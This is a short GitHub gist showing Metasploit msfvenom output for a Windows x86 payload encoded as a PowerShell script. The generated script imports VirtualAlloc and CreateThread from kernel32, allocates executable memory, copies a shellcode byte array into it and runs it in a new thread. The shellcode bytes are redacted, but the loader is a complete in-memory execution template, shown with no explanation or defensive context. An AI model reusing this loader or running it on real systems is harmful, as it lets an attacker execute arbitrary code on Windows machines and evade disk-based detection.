Created
May 23, 2017 23:38
-
-
Save dwendt/d7809d7a2328108cd1ca5b23ff17860c to your computer and use it in GitHub Desktop.
welp
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| No platform was selected, choosing Msf::Module::Platform::Windows from the payload | |
| No Arch selected, selecting Arch: x86 from the payload | |
| Found 1 compatible encoders | |
| Attempting to encode payload with 1 iterations of cmd/powershell_base64 | |
| cmd/powershell_base64 succeeded with size 333 (iteration=0) | |
| cmd/powershell_base64 chosen with final size 333 | |
| Payload size: 333 bytes | |
| Final size of psh file: 2374 bytes | |
| $NHEpDZWJXk = @" | |
| [DllImport("kernel32.dll")] | |
| public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); | |
| [DllImport("kernel32.dll")] | |
| public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); | |
| "@ | |
| $PJNBDGDuWwRH = Add-Type -memberDefinition $NHEpDZWJXk -Name "Win32" -namespace Win32Functions -passthru | |
| [Byte[]] $YsrbMUMHehfA = xxxxxxxxxxxxxxxxxxdeletedxxxxxxxxxxxxxxxxxxxxxxxxxx | |
| $pKanUSjyxxGY = $PJNBDGDuWwRH::VirtualAlloc(0,[Math]::Max($YsrbMUMHehfA.Length,0x1000),0x3000,0x40) | |
| [System.Runtime.InteropServices.Marshal]::Copy($YsrbMUMHehfA,0,$pKanUSjyxxGY,$YsrbMUMHehfA.Length) | |
| $PJNBDGDuWwRH::CreateThread(0,0,$pKanUSjyxxGY,0,0,0) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment